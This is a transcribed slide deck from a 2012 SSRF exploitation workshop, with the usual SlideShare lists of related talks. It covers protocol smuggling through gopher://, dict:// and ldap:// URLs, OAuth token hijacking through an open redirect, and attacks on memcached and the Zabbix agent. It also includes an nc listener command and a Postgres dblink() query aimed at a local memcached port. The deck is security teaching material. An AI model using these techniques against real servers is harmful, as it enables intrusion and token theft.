SlideShare a Scribd company logo

SSRF workshop

Ivan Novikov
Ivan Novikov

08/12/2012 SSRF workshop special for DefCon-UA. Neuronspace, Moscow.

Technology
1 of 24
Download to read offline
SSRF exploitation. Workshop Special for DefCon-UA 08/12/2012 Moscow, Neuron Hackspace
SSRF - Server Side Request Forgery ● The ability to create requests from the vulnerable server to intra/internet ● Using a protocol supported by available URI schemas, you can communicate with services running on other protocols (smuggling)
SSRF - Server Side Request Forgery ● What i can do with forged requests? ● Anything! ○ Get data from internal network! ○ Exploit all host-based auth! ○ Exploit local services at loopback interface! ○ etc...
SSRF - Server Side Request Forgery Forged Access to request loopback interface Access to internal network HTTP HTTP API request request request Frontend Firewall Backend Forged request Intranet
SSRF - reasons ● SSRF not a vulnerability ● SSRF is class of attacks ● XXE,RFI,CRLF injection and others is SSRF's friends ● Anything that can open socket can be SSRFed
SSRF - reasons ● Direct writing to sockets in webapp ● HTTP clients (libcurl, LWP, Java:URL, etc) ● Databases functions ● Format processing ○ XML parsers (XXE, DTD, XSD, XSLT, etc) ○ OpenOffice (DDE, dynamic data, etc) ○ PDF (tcpdf library, etc)
SSRF - what stuff needed? ● Desire ● Luck ● Ability to anticipate and assume ● nc (nc -l -vv -p 12345 ) ● SSRF cheatsheet doc
SSRF - cheatsheet ● We collected all related information about SSRF and their exploitation in one cheatsheet: https://docs.google. com/document/d/1v1TkWZtrhzRLy0bYXBcdL UedXGb9njTNIJXa3u9akHM/edit
HTTP clients bugs Bypass webapp filters i.e. preg_replace using redirect ● any host -> localhost ● valid port -> any port ● valid schema -> any schema ● SOP for browsers, not for HTTPClients
CASE #1. Market & Payment system. OAuth token hijacking ● Application received OAuth token from payment server ● Token added to HTTP request created by libcurl CURLOPT_HTTPHEADER ● This header will be append to all requests sended by libcurl. Even after redirects ;)
CASE #1. Market & Payment system. OAuth token hijacking ● Find a open redirect vuln (WASC-38) at payment server ● Change payment url to call redirect instead of valid payment transaction ● Jack a OAuth token from market to payment system ;) https://dev.onsec.ru/workshop/market/
CASE #1. Market & Payment system. OAuth token hijacking Open SSRF redirect attack vuln HTTP request HTTP with request Payment OAuth Market system token OAuth token from market HTTP request with OAuth token Evil host
Let's go to server-side exploitations ● SSRF really cool for exploit host-based auth ● Host based auth must die ;) ● NoSQL databases, monitoring services and much more provide privileges to loopback connections by default
Protocol smuggling ● When you say "GET / HTTP/1.1", what hears a service? ● When you receive data by one of prehistoric protocols what TCP packet you send? ● When you say "bla[valid packet]bla", what hears a service?
Protocols and URI schemas in HTTP clients ● gopher:// provide you to create almost any TCP packet (no 0x00 for cURL, no bytes greater than 0x7f for Java) ● dict:// provide you to forge second line in plaint/text request (cURL only) ● ldap:// provide you to forge request with constant prefix (LWP only)
What things do smuggling possible? ● HTTP clients don't check a protocol but send data immediately after connect (ldap for LWP) ● Services do not close socket after receive invalid packet ● Protocol that you can forge fits within the protocols that you want to exploit
CASE #2. Wordpress exploitation ● Yes, it is latest wordpress (3.4.2) without any plugins ● Reason - libcurl unsafe redirect ● But SSRF can be triggered only from admin panel ● Use old our friend CSRF! ● CSRF + SSRF make you happy ;)
CASE #2. Wordpress exploitation ● No gopher:// protocol in Debian squeeze for cURL ● But dict:// available and provide us to exploit memcached ● CSRF + SSRF = memcached exploit ;) https://dev.onsec.ru/workshop/wordpress/
Format processors are SSRF friends ● 23/03/2012 in Kyiv I told about XXE based SSRF ● XML parsers, DTD, XSD, XSLT - all of them provide SSRF ● OpenOffice provide SSRF ● Many processing libraries provide SSRF ● Anything that can open socket can be SSRFed
CASE #3. TCPDF library SSRF ● http://www.tcpdf.org/ ● Very common library for PDF conversion ● Example application convert users HTML to PDF ● What about external resources such as images? ● TCPDF using cURL https://dev.onsec.ru/workshop/pdfconv/
CASE #4. LWP avatars uploader ● LWP - libwww Perl ● Usefully and common library ● Provide unsafe redirect ;) ● Support gopher protocol by default ;) ● Lets go!!!
CASE #4. LWP avatars uploader Zabbix agentd explotation ● Zabbix is common monitoring system ● Zabbix agentd - local daemon for various check ● Host-based auth ;) ● Support command execution ;) https://dev.onsec.ru/workshop/avatars/
CASE #5. Have a free time? ● Let's go Postgres explotation ● dblink() function provide us to do SSRF through SQLi http://www.postgresql.org/docs/8. 4/static/dblink.html SELECT dblink_send_query('host=127.0.0.1 dbname=quit user='nstatsn' port=11211 sslmode=disable','select 1');
??? @ONsec_Lab @d0znpp d0znpp@onsec.ru

Recommended

Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrfn|u - The Open Security Community
 
Ssrf
SsrfSsrf
SsrfIlan Mindel
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Pentesting Using Burp Suite
Pentesting Using Burp SuitePentesting Using Burp Suite
Pentesting Using Burp Suitejasonhaddix
 
Hack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydHack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydn|u - The Open Security Community
 
Introduction to burp suite
Introduction to burp suiteIntroduction to burp suite
Introduction to burp suiteUtkarsh Bhargava
 
Dive in burpsuite
Dive in burpsuiteDive in burpsuite
Dive in burpsuiteNadim Kadiwala
 

Recommended

Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrfn|u - The Open Security Community
 
Ssrf
SsrfSsrf
SsrfIlan Mindel
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Pentesting Using Burp Suite
Pentesting Using Burp SuitePentesting Using Burp Suite
Pentesting Using Burp Suitejasonhaddix
 
Hack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydHack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydn|u - The Open Security Community
 
Introduction to burp suite
Introduction to burp suiteIntroduction to burp suite
Introduction to burp suiteUtkarsh Bhargava
 
Dive in burpsuite
Dive in burpsuiteDive in burpsuite
Dive in burpsuiteNadim Kadiwala
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101Zack Meyers
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingNetsparker
 
Burp Suite v1.1 Introduction
Burp Suite v1.1 IntroductionBurp Suite v1.1 Introduction
Burp Suite v1.1 IntroductionAshraf Bashir
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101Shahee Mirza
 
Burp suite
Burp suiteBurp suite
Burp suitehamdi_sevben
 
Burp Suite Starter
Burp Suite StarterBurp Suite Starter
Burp Suite StarterFadi Abdulwahab
 
Api security-testing
Api security-testingApi security-testing
Api security-testingn|u - The Open Security Community
 
Burp suite
Burp suiteBurp suite
Burp suiteYashar Shahinzadeh
 
Burp suite
Burp suiteBurp suite
Burp suitepenetration Tester
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingkinish kumar
 
Click jacking
Click jackingClick jacking
Click jackingRonan Dunne, CEH, SSCP
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST APINutan Kumar Panda
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request ForgeryTony Bibbs
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...Lionel Briand
 

More Related Content

What's hot

CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101Zack Meyers
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingNetsparker
 
Burp Suite v1.1 Introduction
Burp Suite v1.1 IntroductionBurp Suite v1.1 Introduction
Burp Suite v1.1 IntroductionAshraf Bashir
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingkinish kumar
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request ForgeryTony Bibbs
 

What's hot (20)

CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVC
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion Attacks
 
Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101Web Hacking With Burp Suite 101
Web Hacking With Burp Suite 101
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Burp Suite v1.1 Introduction
Burp Suite v1.1 IntroductionBurp Suite v1.1 Introduction
Burp Suite v1.1 Introduction
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Burp suite
Burp suiteBurp suite
Burp suite
 
Burp Suite Starter
Burp Suite StarterBurp Suite Starter
Burp Suite Starter
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Burp suite
Burp suiteBurp suite
Burp suite
 
Burp suite
Burp suiteBurp suite
Burp suite
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Click jacking
Click jackingClick jacking
Click jacking
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request Forgery
 

Viewers also liked

XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...Lionel Briand
 
SSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAPSSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAPERPScan
 
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)OWASP Ottawa
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
Xml external entities [xxe]
Xml external entities [xxe]Xml external entities [xxe]
Xml external entities [xxe]mattymcfatty
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrievalqqlan
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureAndrew Petukhov
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationSandro Gauci
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionBart Leppens
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012_mr_me
 
Final lfh presentation (3)
Final lfh presentation (3)Final lfh presentation (3)
Final lfh presentation (3)__x86
 
Jon Gorenflo - Burp Collaborator
Jon Gorenflo - Burp CollaboratorJon Gorenflo - Burp Collaborator
Jon Gorenflo - Burp Collaboratorcentralohioissa
 
D2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocatorD2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocator_mr_me
 
CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2Zero Science Lab
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 

Viewers also liked (20)

XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
 
SSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAPSSRF vs. Business-critical applications. XXE tunneling in SAP
SSRF vs. Business-critical applications. XXE tunneling in SAP
 
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 
Xml external entities [xxe]
Xml external entities [xxe]Xml external entities [xxe]
Xml external entities [xxe]
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrieval
 
External XML Entities
External XML EntitiesExternal XML Entities
External XML Entities
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructure
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And Exploitation
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012
 
Final lfh presentation (3)
Final lfh presentation (3)Final lfh presentation (3)
Final lfh presentation (3)
 
Jon Gorenflo - Burp Collaborator
Jon Gorenflo - Burp CollaboratorJon Gorenflo - Burp Collaborator
Jon Gorenflo - Burp Collaborator
 
D2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocatorD2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocator
 
CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Engines
 

Similar to SSRF workshop

Building high performance microservices in finance with Apache Thrift
Building high performance microservices in finance with Apache ThriftBuilding high performance microservices in finance with Apache Thrift
Building high performance microservices in finance with Apache ThriftRX-M Enterprises LLC
 
Ch 3: Web Application Technologies
Ch 3: Web Application TechnologiesCh 3: Web Application Technologies
Ch 3: Web Application TechnologiesSam Bowne
 
Networked APIs with swift
Networked APIs with swiftNetworked APIs with swift
Networked APIs with swiftTim Burks
 
Web technology-guide
Web technology-guideWeb technology-guide
Web technology-guideSrihari
 
Distributed Web-Cache using OpenFlow
Distributed Web-Cache using OpenFlowDistributed Web-Cache using OpenFlow
Distributed Web-Cache using OpenFlowAasheesh Tandon
 
Web sockets - Pentesting
Web sockets - Pentesting Web sockets - Pentesting
Web sockets - Pentesting Vandana Verma
 
Introduction to Ethereum
Introduction to EthereumIntroduction to Ethereum
Introduction to EthereumArnold Pham
 
Introduction to Backend Engineering
Introduction to Backend EngineeringIntroduction to Backend Engineering
Introduction to Backend EngineeringUdayYadav90
 
Securing APIs
Securing APIsSecuring APIs
Securing APIsWSO2
 
Micro HTTP Server Implemented in C @ COSCUP 2016
Micro HTTP Server Implemented in C @ COSCUP 2016Micro HTTP Server Implemented in C @ COSCUP 2016
Micro HTTP Server Implemented in C @ COSCUP 2016Jian-Hong Pan
 
De la bonne utilisation de OAuth2
De la bonne utilisation de OAuth2 De la bonne utilisation de OAuth2
De la bonne utilisation de OAuth2 Leonard Moustacchis
 
Build a Micro HTTP Server for Embedded System
Build a Micro HTTP Server for Embedded SystemBuild a Micro HTTP Server for Embedded System
Build a Micro HTTP Server for Embedded SystemJian-Hong Pan
 
Micro HTTP Server for Embedded
Micro HTTP Server for EmbeddedMicro HTTP Server for Embedded
Micro HTTP Server for Embeddedexeri0n1
 
Internet of Things - protocols review (MeetUp Wireless & Networks, Poznań 21....
Internet of Things - protocols review (MeetUp Wireless & Networks, Poznań 21....Internet of Things - protocols review (MeetUp Wireless & Networks, Poznań 21....
Internet of Things - protocols review (MeetUp Wireless & Networks, Poznań 21....Marcin Bielak
 
Building Next Generation Real-Time Web Applications using Websockets
Building Next Generation Real-Time Web Applications using WebsocketsBuilding Next Generation Real-Time Web Applications using Websockets
Building Next Generation Real-Time Web Applications using WebsocketsNaresh Chintalcheru
 

Similar to SSRF workshop (20)

Building high performance microservices in finance with Apache Thrift
Building high performance microservices in finance with Apache ThriftBuilding high performance microservices in finance with Apache Thrift
Building high performance microservices in finance with Apache Thrift
 
Ws
WsWs
Ws
 
Ch 3: Web Application Technologies
Ch 3: Web Application TechnologiesCh 3: Web Application Technologies
Ch 3: Web Application Technologies
 
Networked APIs with swift
Networked APIs with swiftNetworked APIs with swift
Networked APIs with swift
 
Web technology-guide
Web technology-guideWeb technology-guide
Web technology-guide
 
Distributed Web-Cache using OpenFlow
Distributed Web-Cache using OpenFlowDistributed Web-Cache using OpenFlow
Distributed Web-Cache using OpenFlow
 
Infura survey
Infura surveyInfura survey
Infura survey
 
Websocket
WebsocketWebsocket
Websocket
 
Web sockets - Pentesting
Web sockets - Pentesting Web sockets - Pentesting
Web sockets - Pentesting
 
Introduction to Ethereum
Introduction to EthereumIntroduction to Ethereum
Introduction to Ethereum
 
API SECURITY
API SECURITYAPI SECURITY
API SECURITY
 
Introduction to Backend Engineering
Introduction to Backend EngineeringIntroduction to Backend Engineering
Introduction to Backend Engineering
 
Securing APIs
Securing APIsSecuring APIs
Securing APIs
 
Micro HTTP Server Implemented in C @ COSCUP 2016
Micro HTTP Server Implemented in C @ COSCUP 2016Micro HTTP Server Implemented in C @ COSCUP 2016
Micro HTTP Server Implemented in C @ COSCUP 2016
 
Ftp servlet
Ftp servletFtp servlet
Ftp servlet
 
De la bonne utilisation de OAuth2
De la bonne utilisation de OAuth2 De la bonne utilisation de OAuth2
De la bonne utilisation de OAuth2
 
Build a Micro HTTP Server for Embedded System
Build a Micro HTTP Server for Embedded SystemBuild a Micro HTTP Server for Embedded System
Build a Micro HTTP Server for Embedded System
 
Micro HTTP Server for Embedded
Micro HTTP Server for EmbeddedMicro HTTP Server for Embedded
Micro HTTP Server for Embedded
 
Internet of Things - protocols review (MeetUp Wireless & Networks, Poznań 21....
Internet of Things - protocols review (MeetUp Wireless & Networks, Poznań 21....Internet of Things - protocols review (MeetUp Wireless & Networks, Poznań 21....
Internet of Things - protocols review (MeetUp Wireless & Networks, Poznań 21....
 
Building Next Generation Real-Time Web Applications using Websockets
Building Next Generation Real-Time Web Applications using WebsocketsBuilding Next Generation Real-Time Web Applications using Websockets
Building Next Generation Real-Time Web Applications using Websockets
 

More from Ivan Novikov

How to hack. Cyprus meetup
How to hack. Cyprus meetupHow to hack. Cyprus meetup
How to hack. Cyprus meetupIvan Novikov
 
Where is my silver bullet?!
Where is my silver bullet?!Where is my silver bullet?!
Where is my silver bullet?!Ivan Novikov
 
OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)Ivan Novikov
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknessesIvan Novikov
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
 
Distributed computing in browsers as client side attack
Distributed computing in browsers as client side attackDistributed computing in browsers as client side attack
Distributed computing in browsers as client side attackIvan Novikov
 
Yandex rewards. ONsec experience
Yandex rewards. ONsec experienceYandex rewards. ONsec experience
Yandex rewards. ONsec experienceIvan Novikov
 

More from Ivan Novikov (7)

How to hack. Cyprus meetup
How to hack. Cyprus meetupHow to hack. Cyprus meetup
How to hack. Cyprus meetup
 
Where is my silver bullet?!
Where is my silver bullet?!Where is my silver bullet?!
Where is my silver bullet?!
 
OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknesses
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
 
Distributed computing in browsers as client side attack
Distributed computing in browsers as client side attackDistributed computing in browsers as client side attack
Distributed computing in browsers as client side attack
 
Yandex rewards. ONsec experience
Yandex rewards. ONsec experienceYandex rewards. ONsec experience
Yandex rewards. ONsec experience
 

Recently uploaded

Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Install Stable Diffusion in windows machine
